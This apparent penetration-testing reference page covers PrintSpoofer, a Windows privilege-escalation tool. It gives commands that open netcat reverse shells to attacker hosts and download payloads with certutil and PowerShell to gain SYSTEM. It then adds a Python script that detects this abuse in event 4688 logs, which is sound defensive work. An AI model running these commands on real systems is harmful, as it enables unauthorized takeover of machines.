
PrintSpoofer

PrintSpoofer exploits SeImpersonatePrivilege to escalate from service accounts to NT AUTHORITY\SYSTEM on Windows Server 2016, Server 2019, and Windows 10.

Requirements

  • Service account with SeImpersonatePrivilege (e.g., IIS AppPool, SQL Server, DNN application pool)

Usage

# Spawn interactive SYSTEM shell
PrintSpoofer.exe -i -c cmd

# Using PrintSpoofer64 with a reverse shell
PrintSpoofer64.exe -c "c:\path\to\nc.exe ATTACKER_IP PORT -e cmd"

Example: DNN App Pool to SYSTEM

# Confirm privileges
whoami /priv
# Look for: SeImpersonatePrivilege Enabled

# Upload PrintSpoofer64.exe and nc.exe to writable directory
# Execute reverse shell as SYSTEM
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c "c:\DotNetNuke\Portals\0\nc.exe 10.10.14.15 443 -e cmd"

# On attack host, catch shell
nc -lvnp 443
# whoami → nt authority\system

Example: Local Service to SYSTEM

If a webshell runs as nt authority\local service and has SeImpersonatePrivilege, upload a reverse shell and PrintSpoofer64.exe to a writable directory such as C:\Windows\System32\spool\drivers\color.

whoami /all
:: SeImpersonatePrivilege        Impersonate a client after authentication Enabled

certutil -urlcache -f http://ATTACKER_IP:8000/shell.exe C:\Windows\System32\spool\drivers\color\shell.exe
powershell -c "iwr -uri http://ATTACKER_IP:8000/PrintSpoofer64.exe -outfile C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe"

C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe -c "C:\Windows\System32\spool\drivers\color\shell.exe"

On the listener:

connect to [ATTACKER_IP] from TARGET
C:\Windows\system32>whoami
nt authority\system
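Both examples above leave the same trace on the host: a process created by a low-privileged service account whose new token belongs to NT AUTHORITY\SYSTEM, with the creator image sitting in a directory that account could write to. The Python triage below is an added example, not code from PrintSpoofer or from this page; it runs detection logic for that trace over constructed Windows Security event 4688 (process creation) records. The field names (Creator Subject, Target Subject, Creator Process Name, New Process Name) follow the 4688 event on Windows 10 and Server 2016+; the service-account patterns, writable-path hints and all sample records are assumptions made for the example.

```python
"""Triage Windows Security event 4688 records for the footprint of a
SeImpersonatePrivilege abuse: a service-account process creates a new
process whose token is NT AUTHORITY\\SYSTEM. Sample records are constructed.
"""
import re
from dataclasses import dataclass

# Accounts that hold SeImpersonatePrivilege by default and are therefore the
# usual starting point (assumed list; extend for your environment).
SERVICE_ACCOUNT_PATTERNS = [
    re.compile(r"^IIS APPPOOL\\", re.IGNORECASE),
    re.compile(r"^NT AUTHORITY\\(LOCAL|NETWORK) SERVICE$", re.IGNORECASE),
    re.compile(r"^NT SERVICE\\MSSQL", re.IGNORECASE),
]

# Directories a low-privileged account can typically write to (assumed hints).
WRITABLE_PATH_HINTS = [
    r"\windows\system32\spool\drivers\color",
    r"\windows\temp",
    r"\dotnetnuke\portals",
    r"\inetpub",
]


@dataclass
class Finding:
    record_id: int
    creator_account: str
    creator_image: str
    new_image: str
    reasons: list


def _full_account(domain, name):
    return f"{domain}\\{name}"


def is_service_account(account):
    """True if the DOMAIN\\name string matches a known service-account form."""
    return any(p.search(account) for p in SERVICE_ACCOUNT_PATTERNS)


def in_writable_path(image):
    """True if the image path contains one of the writable-directory hints."""
    low = image.lower()
    return any(h in low for h in WRITABLE_PATH_HINTS)


def triage_4688(events):
    """Return a Finding for every record where a service account created a
    process running under a SYSTEM token, with extra reasons for a creator
    image in a writable path and for an interactive shell as the child."""
    findings = []
    for ev in events:
        creator = _full_account(ev["CreatorDomain"], ev["CreatorName"])
        target = _full_account(ev["TargetDomain"], ev["TargetName"])
        # Core signal: Creator Subject is a service account, Target Subject
        # (the account of the new process) is SYSTEM.
        if not (is_service_account(creator) and target.upper() == "NT AUTHORITY\\SYSTEM"):
            continue
        reasons = ["service account spawned a SYSTEM-token process"]
        if in_writable_path(ev["CreatorProcessName"]):
            reasons.append("creator image in user-writable directory")
        if ev["NewProcessName"].lower().endswith(("\\cmd.exe", "\\powershell.exe")):
            reasons.append("interactive shell as child")
        findings.append(Finding(ev["RecordId"], creator, ev["CreatorProcessName"],
                                ev["NewProcessName"], reasons))
    return findings


# Constructed sample records (not real telemetry). Target Subject is "-" when
# the new process runs as the creator, as it does for ordinary launches.
SAMPLE_EVENTS = [
    {"RecordId": 1001, "CreatorDomain": "NT AUTHORITY", "CreatorName": "SYSTEM",
     "TargetDomain": "-", "TargetName": "-",
     "CreatorProcessName": r"C:\Windows\System32\services.exe",
     "NewProcessName": r"C:\Windows\System32\svchost.exe"},
    {"RecordId": 1002, "CreatorDomain": "IIS APPPOOL", "CreatorName": "DefaultAppPool",
     "TargetDomain": "-", "TargetName": "-",
     "CreatorProcessName": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "NewProcessName": r"C:\Windows\System32\conhost.exe"},
    # Shape of the LOCAL SERVICE example on this page.
    {"RecordId": 1003, "CreatorDomain": "NT AUTHORITY", "CreatorName": "LOCAL SERVICE",
     "TargetDomain": "NT AUTHORITY", "TargetName": "SYSTEM",
     "CreatorProcessName": r"C:\Windows\System32\spool\drivers\color\PrintSpoofer64.exe",
     "NewProcessName": r"C:\Windows\System32\spool\drivers\color\shell.exe"},
    # Shape of the DNN app-pool example on this page.
    {"RecordId": 1004, "CreatorDomain": "IIS APPPOOL", "CreatorName": "DotNetNuke",
     "TargetDomain": "NT AUTHORITY", "TargetName": "SYSTEM",
     "CreatorProcessName": r"C:\DotNetNuke\Portals\0\PrintSpoofer64.exe",
     "NewProcessName": r"C:\Windows\System32\cmd.exe"},
]

if __name__ == "__main__":
    for f in triage_4688(SAMPLE_EVENTS):
        print(f.record_id, f.creator_account, "->", f.new_image, "|", "; ".join(f.reasons))
```

The core condition deliberately ignores the tool's file name: renaming PrintSpoofer64.exe does not change the creator-account-to-SYSTEM-token relationship that the event records, so the rule keys on that relationship and uses path and child-image checks only to rank findings. Process creation auditing with command-line logging must be enabled for 4688 to be generated at all.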

Links